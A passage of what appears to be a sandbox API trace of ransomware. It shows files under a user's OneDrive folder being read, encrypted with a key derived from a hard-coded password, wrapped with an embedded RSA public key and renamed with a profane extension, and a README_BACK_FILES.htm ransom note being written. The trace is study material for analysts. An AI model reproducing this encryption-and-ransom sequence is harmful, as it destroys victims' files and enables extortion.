lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.490] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.490] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.490] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.490] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.490] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.490] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.490] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.490] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.490] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.490] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.490] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.490] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.491] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.491] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.491] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.491] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.491] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.491] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.491] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.491] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.491] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.491] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.491] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.491] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.492] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.492] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.492] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.492] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.492] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.492] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.492] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.492] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.492] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.492] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.493] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.493] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.493] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.493] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.493] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.493] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.493] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.493] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.493] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.493] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.493] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.494] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.494] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.494] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.494] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.494] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.494] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.494] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.494] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.494] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.494] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.494] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.494] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.495] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.495] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.495] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.495] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x50, lpOverlapped=0x0) returned 1 [0272.495] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x50, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x60) returned 1 [0272.495] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x60, lpOverlapped=0x0) returned 1 [0272.495] CloseHandle (hObject=0x5d4c) returned 1 [0272.495] CloseHandle (hObject=0x5d48) returned 1 [0272.496] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0272.502] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0272.503] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0272.505] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0272.507] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0272.507] CryptDestroyKey (hKey=0x2fa988) returned 1 [0272.507] CryptReleaseContext (hProv=0x2f27dd0, dwFlags=0x0) returned 1 [0272.507] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0272.507] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0272.507] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\readme_back_files.htm")) returned 0xffffffff [0272.507] AreFileApisANSI () returned 1 [0272.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28894e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0272.507] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ar\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0272.509] GetFileType (hFile=0x5d3c) returned 0x1 [0272.509] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0272.555] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0272.556] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0272.557] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0272.557] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0272.557] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0272.557] GetLastError () returned 0x0 [0272.557] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\filesync.localizedresources.dll.mui")) returned 0x20 [0272.558] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0272.558] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0272.560] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\as-in\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0272.562] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0272.563] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f28e48) returned 1 [0272.565] CryptCreateHash (in: hProv=0x2f28e48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0272.565] lstrlenA (lpString="aECpWcPppDlAmtrTSptkyOWgzMlQm") returned 29 [0272.565] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0272.565] CryptDeriveKey (in: hProv=0x2f28e48, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fad48) returned 1 [0272.566] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0272.566] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0272.566] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f294a8) returned 1 [0272.566] CryptImportPublicKeyInfo (in: hCryptProv=0x2f294a8, dwCertEncodingType=0x1, pInfo=0x2f31db0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31de0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31de8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb008) returned 1 [0272.566] CryptEncrypt (in: hKey=0x2fb008, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0272.566] CryptEncrypt (in: hKey=0x2fb008, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f299f8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f299f8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0272.567] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f299f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f299f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0272.568] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.586] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.586] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, 